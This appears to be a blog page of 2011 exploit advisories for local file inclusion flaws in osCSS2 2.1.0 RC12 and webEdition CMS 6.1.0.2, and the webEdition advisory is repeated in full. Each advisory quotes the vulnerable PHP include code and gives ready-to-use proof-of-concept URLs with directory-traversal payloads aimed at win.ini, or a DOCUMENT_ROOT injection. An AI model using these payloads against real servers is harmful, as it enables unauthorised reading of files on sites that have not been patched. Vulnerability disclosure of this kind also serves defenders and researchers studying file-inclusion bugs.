===================================================================
osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
Software: osCSS2 2.1.0 RC12
Vendor: http://www.oscss.org/
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
osCSS is a php ecommerce shopping program. Built on a foundation of oscommerce GPL code .
This version bring the script to web standard using XHTML 1.1 strict for markup language and CSS for layout presentation.
----------------------------------
Vulnerability Details:
Some Vulnerability has been discovered by John Leitch (AutoSec Tools) that can be exploited via browser (xss & LFI) :
http://www.exploit-db.com/exploits/17069/
http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
-----------------------------------
Here is another vulnerability code i found there:
[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php
*/
$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>
-----------------------------------
[!] admin/includes/template/oscss/gabarit-2.php
*/
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>
-----------------------------------
exploit & p0c
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/28
webEdition CMS Version 6.1.0.2 (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
Software: webEdition CMS Version 6.1.0.2
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
webEdition Version 6.1.0.2
webEdition is a web content management system licensed under the GPL
For system requirements,
installation and upgrade details, see the files INSTALL and the informations available on our website
http://www.webedition.org
see webEdition/license folder for license informations
see INSTALL for quick installation instructions.
----------------------------------
Vulnerability code:
index.php
/*****************************************************************************
* INITIALIZATION
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");
/*****************************************************************************
* INCLUDES
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");
$ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true");
/*****************************************************************************
----------------------------------
exploit & p0c
[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]
or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]
Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet.
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
Software: webEdition CMS Version 6.1.0.2
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
webEdition Version 6.1.0.2
webEdition is a web content management system licensed under the GPL
For system requirements,
installation and upgrade details, see the files INSTALL and the informations available on our website
http://www.webedition.org
see webEdition/license folder for license informations
see INSTALL for quick installation instructions.
----------------------------------
Vulnerability code:
index.php
/*****************************************************************************
* INITIALIZATION
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");
/*****************************************************************************
* INCLUDES
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");
$ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true");
/*****************************************************************************
----------------------------------
exploit & p0c
[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]
or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]
Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet.
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Subscribe to:
Posts (Atom)